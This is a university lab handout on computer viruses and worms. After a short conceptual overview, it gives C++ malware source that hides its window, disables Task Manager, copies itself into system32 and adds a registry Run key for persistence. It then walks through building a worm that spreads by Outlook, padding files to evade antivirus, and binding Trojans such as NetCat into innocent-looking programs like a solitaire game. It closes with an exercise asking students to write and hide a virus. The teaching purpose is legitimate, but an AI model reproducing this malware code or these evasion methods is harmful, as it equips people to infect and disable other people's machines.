Virus and Worms: Objectives
Virus and Worms: Objectives
Virus and Worms: Objectives
Computer Virus:
The first phase, in which the virus inserts itself into a file, is called the
insertion phase. The second phase, in which it performs some action, is
called the execution phase. The following pseudocode fragment shows
how a simple computer virus works.
Beginvirus:
if spread-condition then begin
for some set of target files do begin
if target is not infected then begin
determine where to place virus instructions
copy instructions from beginvirus to endvirus
into target
alter target to execute added instructions
end;
end;
end;
perform some action(s)
goto beginning of infected program
endvirus:
As this code indicates, the insertion phase must be present but need not
always be executed. For example, a virus that infect boot file would
check for an uninfected boot file (the spread-condition mentioned in the
pseudocode) and, if one was found, would infect that file (the set of
target files).
136
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Types of Viruses
Parasitic virus: The traditional and still most common form of virus. A
parasitic virus attaches itself to executable files and replicates, when the
infected program is executed, by finding other executable files to infect.
137
Internet Security ECOM 5347 Lab 14 Viruses & Worms
138
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Phage virus: a phage virus modifies and alters other programs and
databases. The virus infects all of these files. The only way to remove
this virus is to reinstall the programs that are infected. If you miss even a
single incident of this virus on the victim system, the process will start
again and infect the system once more.
Worms
A worm is a program that can replicate itself and send copies from
computer to computer across network connections. Upon arrival, the
worm may be activated to replicate and propagate again. In addition to
propagation, the worm usually performs some unwanted function. Early
worms filled up memory and bred inside the RAM of the target
139
Internet Security ECOM 5347 Lab 14 Viruses & Worms
A worm is different from a virus in that it can reproduce itself, it’s self-
contained , and it doesn’t need a host application to be transported.
Many of the so-called viruses that have made the papers and media
were, in actuality, worms and not viruses. However, it’s possible for a
worm to contain or deliver a virus to a target system.
Logic Bomb
The logic bomb is code embedded in some legitimate program that is set
to "explode" when certain conditions are met and performs an action
that violates the security policy. Examples of conditions that can be used
as triggers for a logic bomb are the presence or absence of certain files,
a particular day of the week or date, or a particular user running the
application. Once triggered, a bomb may alter or delete data or entire
files, cause a machine halt, or do some other damage.
Example:
In the attack depicted in Figure 2.20, the logic bomb sends a message
back to the attacking system that it has loaded successfully. The victim
system can then be used to initiate an attack such as a DDoS attack, or it
can grant access at the time of the attacker’s choosing.
Figure 3
140
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Antivirus Approaches
141
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Lab Experiment
Requirements:
We need only one machine in this experiment to built our malicious code and
run it.
Procedures :
Part 1 : Writing your virus (Using C++):
Code
#include <windows.h>
#include <iostream>
using namespace std;
int main ( )
{
//----------------1--------------------
AllocConsole();
ShowWindow (FindWindowA("ConsoleWindowClass",NULL),0);
//----------------2--------------------
HKEY hKey;
unsigned char reg[2] = "1";
RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\
CurrentVersion\\Policies\\system",&hKey);
RegSetValueEx(hKey,"disabletaskmgr",0,REG_DWORD,reg,sizeof(reg
));
RegCloseKey(hKey);
//------------------3------------------
char windir[MAX_PATH];
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\code.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] = windir+"";
if(RegOpenKeyEx(
HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersi
on\\Run",0,KEY_SET_VALUE,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2,
"Code",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(
HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersio
n\\Run",0,KEY_SET_VALUE,&hKey2 );
142
Internet Security ECOM 5347 Lab 14 Viruses & Worms
RegSetValueEx(hKey2,
"Code",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
//------------------4------------------
char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH, path, 255);
CopyFile(path,"C:\\code.exe",FALSE);
system("pause");
return 0;
For the above code : (each number below is corresponding to number in comment in
code):
1- This code hide the resultant virus window that must be displayed when you
run any application normally.
2- This part of code create a new registry key named disabletaskmgr in the path
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system in
HKEY_CURRENT_USER to disable task manager (ctrl+alt+delete) , we assign
value 1 to new registry key.
Method RegCreateKey create new key and RegSetValueEx set the value for
the specified key.
3- In this part we copy our malicious code to a path so that it can be run at
startup; For the code below we get path of windows folder using
GetWindowsDirectory method , we obtain module handle name by
GetModuleFileName and copy it to system32 folder in windows directory by
CopyFile method ; then we create a registry key in
Software\\Microsoft\\Windows\\CurrentVersion\\Run to run this
code when the computer starts or logon.
4- Last part of code , we use to copy our code in different paths so that it is
difficult to erase ,this part to spread your virus code you can add more
CopyFile statement.
143
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Figure 4
Figure 5
- If you want to spread your worm via outlook (if your victim use outlook) ; you
can determine a message title and body; you can configure from Outlook
Options the same thing you can configure other spreading options such P2P.
144
Internet Security ECOM 5347 Lab 14 Viruses & Worms
- Now choose the action you want to perform from the list that included in
Payload Options; let us choose Run File/Link and type www.iugaza.edu.ps,
payload options available by this tool is listed in figure 6.
Figure 6
- The last thing is determine when your action will tack place form Payload
Trigger Options figure 7; you can choose on execution as an example; then
click construct worm.
Figure 7
- When you run the resultant worm the result as the figure 8.
145
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Figure 8
Stealth Tools :
We can use this tool to hide viruses and malwares also Trojans from antivirus
software.
- First of all determine the file you want to use as virus .
- Add Bytes : it is add white bytes = NOP instruction ; it is useful to throwing
off antivirus software ; figure 9 shows the interface of this tool and simple
configuration of add bytes option.
Test the file size before and after adding NOP operation?
Open the produced file using any text editor and see NOP operation.
146
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Figure 9
- Another method to hide your malicious code is binding file with another
executable file to create single executable file as shown in figure 10.
Figure 10
147
Internet Security ECOM 5347 Lab 14 Viruses & Worms
Eliterwrap Tool:
Another tool we can use to hide executable files is eliterwrap ; this tool allow
you to hide executable file (malicious code : Trojan or virus) in legal one as solitaire
game as example.
By this tool we can embed tool such NetCat (refer to NetCat lab) and we specify the
command to execute when running the file in Enter command line step, with
another executable file.
Figure 11 shows hiding Trojan named patch with solitaire spider to produce
executable file named play.exe.
Figure 11
Exercise:
Write a virus code in c++ to disable regedit and run on startup ; hide your
code in any method . In your opinion what is the effective way to hide the
code to be away of antivirus discovery.
148